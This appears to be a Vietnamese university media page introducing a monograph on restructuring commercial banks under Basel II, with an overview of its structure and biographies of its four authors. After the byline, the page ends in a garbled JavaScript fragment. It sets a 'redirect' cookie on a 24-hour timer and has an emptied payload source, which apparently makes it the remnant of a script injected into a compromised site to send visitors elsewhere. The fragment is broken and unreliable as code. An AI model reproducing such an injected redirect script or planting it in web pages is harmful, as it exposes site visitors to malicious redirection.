PGS.TS.Nguyễn Ngọc Thắng – Phó Chủ nhiệm Khoa Quản trị và Kinh doanh (HSB) – ĐHQGHN với vai trò là đồng tác giả đã cùng các cộng sự xây dựng được một khung khổ lý thuyết, lý luận và thực tiễn về chủ đề tái cấu trúc ngân hàng thương mại theo chuẩn mực Basel II.
Ngân hàng thương mại đóng vai trò đặc biệt quan trọng trong quá trình phát triển kinh tế – xã hội của mỗi quốc gia. Thông qua ngân hàng thương mại, các nguồn vốn nhàn rỗi được huy động để cung cấp cho những nơi cần vốn phát triển hoạt động sản xuất – kinh doanh, làm cầu nối cho các doanh nghiệp với thị trường, tài chính quốc gia với tài chính quốc tế. Chính vì vậy, sự suy yếu hay khủng hoảng tài chính trong hệ thống ngân hàng thương mại có thể ảnh hưởng lớn tới hoạt động kinh doanh của các ngân hàng cũng như tới nền kinh tế, chính trị của quốc gia.
Ở Việt Nam, trong những năm vừa qua, với mục tiêu hoạt động an toàn bền vững, nhiều ngân hàng đã và đang từng bước tái cấu trúc, tiếp cận áp dụng chuẩn mực Basel II trong lĩnh vực quản trị rủi ro ngân hàng. Basel II là một trong những công cụ hữu ích giúp các ngân hàng có thể tích lũy một lượng vốn dự trữ nhằm bù trừ vào tổn thất, rủi ro do hoạt động ngân hàng mang lại. Tuy nhiên trên thực tế, việc triển khai thực hiện Basel II tại các ngân hàng thương mại còn chậm, gặp nhiều khó khăn thách thức. Nguyên nhân là do tính phức tạp về nội dung của Hiệp ước, thiếu nhân lực và yêu cầu cao về lượng vốn đầu tư thực hiện… Chính vì vậy, việc nghiên cứu, phân tích tổng hợp cơ sở lý luận và thực tiễn về tái cấu trúc ngân hàng thương mại theo chuẩn mực Basel II là cần thiết.
Trong thời gian vừa qua, với những nỗ lực nghiên cứu của mình, PGS.TS.Nguyễn Ngọc Thắng – Phó Chủ nhiệm Khoa Quản trị và Kinh doanh (HSB) – ĐHQGHN với vai trò là đồng tác giả đã cùng các cộng sự xây dựng được một khung khổ lý thuyết, lý luận và thực tiễn về chủ đề tái cấu trúc ngân hàng thương mại theo chuẩn mực Basel II trong cuốn sách có tựa đề “Tái cấu trúc ngân hàng thương mại theo chuẩn mực Basel II”. Cuốn sách chuyên khảo này được ra đời với mong muốn cung cấp kết quả nghiên cứu chuyên sâu của các nhà khoa học, chuyên gia nhằm giúp các ngân hàng thương mại, cơ quan quản lý, các đơn vị liên quan có thêm nguồn tài liệu tham khảo hữu ích để triển khai thực hiện tái cấu trúc ngân hàng thương mại theo chuẩn mực Basel II ở cả cấp độ quản lý và ngân hàng thương mại. Kết quả nghiên cứu này cũng là cơ sở cho các nghiên cứu chuyên sâu tiếp theo cũng như giúp ích cho việc xây dựng bài giảng về chủ đề này tại các trường đại học.
Cuốn sách được cấu trúc thành 4 phần gồm 9 chương, với ý tưởng chủ đạo xuyên suốt là vận dụng khoa học quản trị liên ngành vào việc nghiên cứu, hoạch định chiến lược tái cấu trúc ngân hàng thương mại theo chuẩn mực Basel II. Trong đó, phần đầu tập trung làm sáng tỏ các khái niệm, quan điểm về tái cấu trúc ngân hàng thương mại, các lý thuyết liên quan đến tái cấu trúc, cơ sở lý luận về tái cấu trúc ngân hàng thương mại theo chuẩn mực Basel II. Phần thứ hai trình bày các nghiên cứu chuyên sâu của các tác giả về chủ đề tái cấu trúc ngân hàng thương mại theo chuẩn mực Basel II và một số hàm ý, khuyến nghị. Phần thứ ba phân tích, tổng hợp kinh nghiệm quốc tế về tái cấu trúc ngân hàng theo chuẩn mực Basel II. Phần 4 phân tích hoạt động tái cấu trúc ngân hàng thương mại theo chuẩn mực Basel II tại Việt Nam giai đoạn 2011-2015. Trên cơ sở vận dụng các kết quả nghiên cứu lý thuyết và thực tiễn, các tác giả đã tiến hành phân tích, hoạch định chiến lược tái cấu trúc điển hình tại một ngân hàng thương mại Việt Nam đến năm 2020.
HSB Media xin trân trọng giới thiệu cùng độc giả cuốn sách “Tái cấu trúc ngân hàng thương mại theo chuẩn mực Basel II”.
——————————–
Nhóm tác giả biên soạn cuốn sách “Tái cấu trúc ngân hàng thương mại theo chuẩn mực Basel II” bao gồm:
TS.Nguyễn Khương (Chủ biên): Hiện công tác tại Cục Quản trị – Ngân hàng Nhà nước Việt Nam. Ông nhận bằng Thạc sĩ và Tiến sĩ Kinh tế chuyên ngành Quản trị Kinh doanh tại trường Đại học Kinh tế – ĐHQG Hà Nội. Ông có nhiều năm nghiên cứu và tư vấn về quản lý dự án, quản trị chiến lược, tái cấu trúc ngân hàng, đồng thời ông đã công bố một số nghiên cứu trên các tạp chí khoa học uy tín trong lĩnh vực quản lý kinh tế, tài chính ngân hàng.
PGS.TS. Nguyễn Ngọc Thắng (đồng tác giả) hiện là Phó Chủ nhiệm Khoa Quản trị và Kinh doanh (HSB) – ĐHQG HN. Ông tốt nghiệp Thạc sĩ Quản trị Kinh doanh tại Đại học Nam California, Hoa Kỳ và Tiến sĩ Khoa học Kinh tế ứng dụng tại Đại học Gent, Vương quốc Bỉ. Ông đã có 8 năm làm việc tại châu Âu với vai trò chuyên gia về phát triển tổ chức và nhân sự tại Ủy ban châu Âu và Công ty Kiểm toán Pricewaterhouse Coopers Belgium. Các lĩnh vực nghiên cứu và giảng dạy chính của ông là quản trị chiến lược, ra quyết định quản trị, trách nhiệm xã hội của doanh nghiệp. Ông đã công bố nhiều công trình nghiên cứu trên các tạp chí khoa học quốc tế uy tín thuộc danh mục ISI/SCOPUS. Ngoài ra, ông từng làm chuyên gia tư vấn cho các dự án liên quan đến phát triển tổ chức và nhân sự, quản trị dự trên tri thức của UNDP, USAID, BTC và JICA tại Việt Nam.
TS.Lê Trung Thành (đồng tác giả) từng là Quyền Chủ nhiệm Khoa Tài chính – Ngân hàng và hiện là Trưởng phòng Nghiên cứu Khoa học và Hợp tác Phát triển, Trường ĐH Kinh tế – ĐHQG HN. Ông tốt nghiệp chương trình Tiến sĩ tại ĐH Kinh tế Quốc dân, thực tập nghiên cứu tại Trung tâm Nghiên cứu Kinh tế Châu Âu – CHLB Đức. Ông có nhiều năm kinh nghiệm trong giảng dạy, nghiên cứu và tư vấn về lĩnh vực tài chính. Ông đã tham gia thực hiện nhiều dự án mới với các tổ chức như Ngân hàng Thế giới (WB), USAID, Irish Aid, Bộ Kinh tế Thụy Sĩ và nhiều Bộ, Ngành ở Việt Nam.
ThS.Nguyễn Linh (Đồng tác giả) hiện là Phó trưởng phòng Kế hoạch – Tài chính, Sở Công thương TP.Hà Nội. Ông nhận bằng Thạc sĩ Kinh tế chuyên ngành Kinh tế Quốc tế tại Trường ĐH Kinh tế – ĐHQG Hà Nội. Ông đã có nhiều kinh nghiệm quản lý nhà nước trong lĩnh vực công thương nghiệp cũng như nghiên cứu chuyên sâu về hội nhập kinh tế quốc tế, tự do hóa tài khoản vốn trong Asian+3…Do vậy những phân tích của ông về kinh nghiệm quốc tế để vận dụng và Việt Nam có nhiều giá trị và mang tính thực tiễn cao.
Thùy Dung
{var U=(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’‘)}